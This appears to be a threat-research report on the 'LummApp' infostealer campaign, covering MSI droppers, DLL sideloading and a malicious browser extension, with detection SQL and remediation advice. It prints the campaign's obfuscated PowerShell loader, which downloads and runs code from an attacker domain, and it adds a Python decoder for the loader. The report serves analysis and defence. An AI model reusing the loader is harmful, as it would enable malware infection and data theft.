In October 2024, Team Axon researchers uncovered a notable large-scale threat campaign, dubbed "LummApp," targeting users and organizations through a combination of advanced adware and infostealing techniques. Disguised as a benign application, LummApp deploys malicious browser extensions capable of exfiltrating data, capturing screen activity, manipulating clipboard contents, and tracking user browsing behavior.
The campaign was first identified during an investigation into a network incident at a European company, exposing LummApp’s global reach and unique attack methods. Likely active since early October 2024, LummApp is distributed via ZIP files containing MSI installers that deploy the malicious extensions on compromised devices. It employs advanced evasion techniques, including DLL sideloading and heavily obfuscated PowerShell scripts. By abusing legitimate, OBS-signed executables to sideload its DLLs, the malware bypasses traditional security measures, enabling persistent and undetected execution.
LummApp also leverages components of the Lumma Info Stealer, a SaaS (Software as a Service) malware framework designed to extract sensitive information from infected systems. It belongs to the broader category of info-stealing malware, primarily targeting user credentials, financial data, and other sensitive information. Lumma remains a significant threat to individuals and organizations alike.
The attack begins on websites hosting cracked software and torrents, such as MediaFire. When a user attempts to install software from these sites, a new pop-up window appears, displaying a visual message stating “Installation in progress.” Meanwhile, the actual software installation occurs in a separate browser tab.
Simultaneously, the user is redirected to a Mega.nz link, which provides a ZIP file for download. Inside this ZIP file is an .MSI file—the malicious payload. This file initiates the infection process when executed, leveraging user trust and disguising the malware as a legitimate installer.
MSI Execution
The Microsoft Software Installer (MSI) initiates the attack by creating a directory within %appdata%/Roaming with a name pattern resembling /XXX XXX XX/XXXXApp/. This directory is populated with all necessary files for the following stages of the attack, including DLLs, executables, and configuration files.
The attacker utilizes UnRAR.exe to unpack a malicious DLL required for the next phase, which involves a DLL sideloading technique.
In various versions of this campaign, the UnRAR.exe command consistently appears with similar parameters, often using the same password to unpack files. The command is structured as follows:
"UnRAR.exe" x -p2161183588a "<path_to_directory>/RoxiApp/kafkjo.rar" "<path_to_directory>/RoxiApp/"
During installation, the MSI file runs a signed executable from a trusted, well-known company. However, this executable is vulnerable to a DLL sideloading exploit, which the attacker uses to load a malicious DLL from a newly created directory. By exploiting this weakness, the malware bypasses security controls and executes further malicious actions on the system.
Notable executables observed in this campaign include:
DLL Sideloading
Once executed, the legitimate executable searches for a DLL with a specific name in its current directory. When placed in an attacker-controlled directory within AppData, it discovers and loads the malicious DLL planted there. This DLL, previously unpacked and containing obfuscated code, evades detection mechanisms.
After being loaded, the malicious DLL injects a Lummac2 executable into explorer.exe, allowing the attacker to execute additional payloads and actions under the guise of a trusted system process.
Our analysis reveals the following activities performed by the injected explorer.exe process:
This activity highlights the threat’s focus on sensitive data, including financial and personal information, using multiple techniques to avoid detection and persist within the environment.
Encoded PowerShell command
Stage 1
An encoded PowerShell command was executed by the injected explorer.exe process. Here is an example of the decoded command.
$VEkiM = ("Qh0+CQMxQjk/Mx1AOBRERio7BxZAKAcfHwg4Fj80JAckRDlFKjw+ORgXTU0=")
$cehG9 = $VEkiM.Replace("@", "a")
$E7Bu1 = [Convert]::FromBase64String($cehG9) | ForEach-Object { $_ -bxor 112}
$rRtwl = [System.Text.Encoding]::ASCII.GetString($E7Bu1).Replace("@", "a")
$uk89P = [Convert]::FromBase64String($rRtwl)
$a43xC = [byte[]](178, 23, 6, 192, 126);
$qefST = 0;
$xlnIE = $uk89P | ForEach-Object {
    $_ -bxor $a43xC[$qefST++];
    if ($qefST -ge $a43xC.Length) {
        $qefST = 0
    }
}
$cd4to=new-object System.Net.Webclient;
$ODs6C = [System.Text.Encoding]::ASCII.GetString($xlnIE);
$Rl13o=$cd4to.DownloadString($ODs6C);
$rGlTq = $Rl13o.Replace("!", "l").Replace("*", "d").Replace("`"", "T").Replace("'", "H").Replace(";", "F")
$hluEJ = [Convert]::FromBase64String($rGlTq)
[System.Text.Encoding]::ASCII.GetString($hluEJ) | iex
The script defines a Base64-encoded string $VEkiM, decodes it, and XORs every byte with 112, which yields a second Base64 string. After decoding that string and applying a rolling XOR with the five-byte key in $a43xC, it recovers a URL, hXXps://tcl-black[.]com/2010[.]bs64, which it fetches using System.Net.WebClient.
The downloaded content undergoes character replacement and Base64 decoding to yield a second encoded command, which is then executed with IEX (Invoke-Expression). The URL returns a large obfuscated command, marking the next stage of the attack.
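The decoding chain above can be reproduced statically, so an analyst can pull the staging URL out of a sample without ever running the loader. The following Python is an added example and not part of the original research: the blob, XOR values and substitution map are copied from the decoded command above, while SAMPLE_STAGE2 is a constructed stand-in for the hosted stage-2 file, not the real payload.

```python
import base64

# Values copied from the decoded stage-1 loader shown above
STAGE1_BLOB = "Qh0+CQMxQjk/Mx1AOBRERio7BxZAKAcfHwg4Fj80JAckRDlFKjw+ORgXTU0="
STAGE1_XOR = 112                                    # $_ -bxor 112
STAGE1_ROLLING_KEY = bytes([178, 23, 6, 192, 126])  # $a43xC
# Character substitutions the loader applies to the downloaded text
STAGE2_SUBST = {"!": "l", "*": "d", '"': "T", "'": "H", ";": "F"}


def xor_rolling(data: bytes, key: bytes) -> bytes:
    """XOR each byte with key[i mod len(key)], i.e. the $qefST counter loop."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_stage1_url(blob: str = STAGE1_BLOB) -> str:
    """Recover the download URL from the loader's embedded blob, offline."""
    layer1 = bytes(b ^ STAGE1_XOR for b in base64.b64decode(blob.replace("@", "a")))
    inner_b64 = layer1.decode("ascii").replace("@", "a")   # second Base64 layer
    plain = xor_rolling(base64.b64decode(inner_b64), STAGE1_ROLLING_KEY)
    return plain.decode("ascii")


def decode_stage2_payload(hosted_text: str) -> str:
    """Undo the substitution and Base64 layer on the fetched stage-2 text."""
    b64 = hosted_text
    for src, dst in STAGE2_SUBST.items():
        b64 = b64.replace(src, dst)
    return base64.b64decode(b64).decode("ascii", errors="replace")


def defang(url: str) -> str:
    """Render a recovered URL in a form that is safe to paste into a report."""
    return url.replace("http", "hxxp").replace(".", "[.]")


# Constructed sample of a hosted stage-2 file (not the real one):
# base64("Write-Host test") with every 'd' swapped for '*', as the loader expects.
SAMPLE_STAGE2 = "V3Jp*GUtSG9z*CB0ZXN0"

if __name__ == "__main__":
    print("stage-1 URL:", defang(decode_stage1_url()))
    print("stage-2 sample decodes to:", decode_stage2_payload(SAMPLE_STAGE2))
```

Running the block prints the defanged staging URL that matches the one named above, which is a quick way to confirm a new sample belongs to the same loader family.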
Stage 2
The decoded command initiates several obfuscation-heavy support functions and processes a large, comma-separated base64 string spanning over 3,400 lines.
Here's a summary of the command's actions:
The resulting files form a browser extension, primed for the campaign’s next stage. This extension is designed to conduct further actions within the target environment.
Browser Extension
Based on our research, the end goal of the malware is to deploy a browser extension, which is composed of heavily obfuscated JavaScript functions.
The browser extension directory structure is split between two main libraries:
Domains:
URLs:
Hashes:
SELECT *
FROM INVESTIGATION.EDR_PROCESS_CREATION_EVENTS
WHERE EVENT_TIME > current_timestamp - interval '30d'
AND (
INITIATING_PROCESS_PATH ILIKE '%appdata%app%obs-ffmpeg-mux.exe%'
OR TARGET_PROCESS_PATH ILIKE '%appdata%app%obs-ffmpeg-mux.exe%'
OR PARENT_PROCESS_PATH ILIKE '%appdata%app%obs-ffmpeg-mux.exe%'
OR INITIATING_PROCESS_PATH ILIKE '%appdata%app%nvidia%'
OR TARGET_PROCESS_PATH ILIKE '%appdata%app%nvidia%'
OR PARENT_PROCESS_PATH ILIKE '%appdata%app%nvidia%'
OR TARGET_PROCESS_COMMANDLINE ILIKE '%explorer.exe explorer.exe'
);
Uninstall Suspicious Applications
Check Browser Extensions
Check for Persistence mechanisms:
In the samples analyzed by Hunters, no persistence mechanisms were identified. However, we recommend checking for potential persistence mechanisms that may have been created by this campaign, such as entries in Task Scheduler, Startup programs, or Registry Run keys.
To stay updated on threat-hunting research, activities, and queries, follow Team Axon’s X/Twitter account (@team__axon).